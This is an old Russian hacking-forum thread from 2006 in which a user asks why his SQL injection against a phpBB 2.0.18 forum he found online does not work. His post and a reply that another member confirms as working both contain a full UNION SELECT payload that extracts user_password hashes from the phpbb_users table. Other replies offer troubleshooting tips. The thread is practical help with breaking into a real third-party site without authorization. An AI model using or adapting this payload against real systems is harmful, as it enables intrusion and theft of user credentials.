ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос насчет sql injection.
  #1  
Старый 11.04.2006, 16:16
Аватар для Lord Nikon
Lord Nikon
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656

Репутация: 22
По умолчанию Вопрос насчет sql injection.

Я хотел бы узнать почему не получается провести sql injection,понимаю мембер ачата уже должен наизусть выучить все это и с этим у него не должно быть никаких проблем,но у мя возникли (может из за моей невнимательности).
Вот код
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id=айди юзера/* я нашел форум и решил попробовать на нем,как всегда у мя ничего не вышло =).Он после запроса выкидавал выкидывал на гшлавнубю страницу форума,то есть ни хеша ничего мне не выдает.Кстати форум на движке phpbb 2.0.18.
Спасибо за помощь.Не ругайтесь пожалуйста.=)
 
Ответить с цитированием

  #2  
Старый 12.04.2006, 21:03
Аватар для Nemesis
Nemesis
Новичок
Регистрация: 10.04.2006
Сообщений: 6
Провел на форуме:
2957

Репутация: 0
По умолчанию

А кто сказал что префикс phpbb? и вообще, запрос может быть вполне неверен...
 
Ответить с цитированием

  #3  
Старый 12.04.2006, 21:20
Аватар для Lord Nikon
Lord Nikon
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656

Репутация: 22
По умолчанию

ну извини я сначало видео посмотрел а потом поробовал.
 
Ответить с цитированием

  #4  
Старый 12.04.2006, 23:44
Аватар для Lord Nikon
Lord Nikon
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656

Репутация: 22
По умолчанию

Народ в чем же ошибка?
 
Ответить с цитированием

  #5  
Старый 12.04.2006, 23:47
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

может профиксили? попробуй просто -99+or+1=1 че будет
 
Ответить с цитированием

  #6  
Старый 13.04.2006, 00:04
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

У меня так всё работает...
Код:
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=[тут id]/*
ЗЫ чё-то как-то пробелы сами добавляются....
__________________
 
Ответить с цитированием

  #7  
Старый 13.04.2006, 03:57
Аватар для Lord Nikon
Lord Nikon
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656

Репутация: 22
По умолчанию

Цитата:
Сообщение от max_pain89  
может профиксили? попробуй просто -99+or+1=1 че будет
он меня так же выкидывает на index.php.Ничего не происходит.
Цитата:
Сообщение от +toxa+  
У меня так всё работает...
Код:
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=[тут id]/*
ЗЫ чё-то как-то пробелы сами добавляются....
ты имеешь ввиду у тя таким образом все получается?
 
Ответить с цитированием

  #8  
Старый 13.04.2006, 04:12
Аватар для Desr0w
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553

Репутация: 319


Отправить сообщение для Desr0w с помощью ICQ
По умолчанию

Цитата:
Сообщение от +toxa+
У меня так всё работает...
Цитата:
ты имеешь ввиду у тя таким образом все получается?
Судя по ответу работает-соответственно получается
 
Ответить с цитированием

  #9  
Старый 13.04.2006, 08:10
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Мемберы античата не все разбираються в sql.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #10  
Старый 13.04.2006, 16:10
Аватар для Lord Nikon
Lord Nikon
Banned
Регистрация: 12.09.2005
Сообщений: 242
Провел на форуме:
292656

Репутация: 22
По умолчанию

успокойся,если не хочешь чтоб я был в мемберах так и скажи =)

Насчет вопроса - получается что профиксили?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ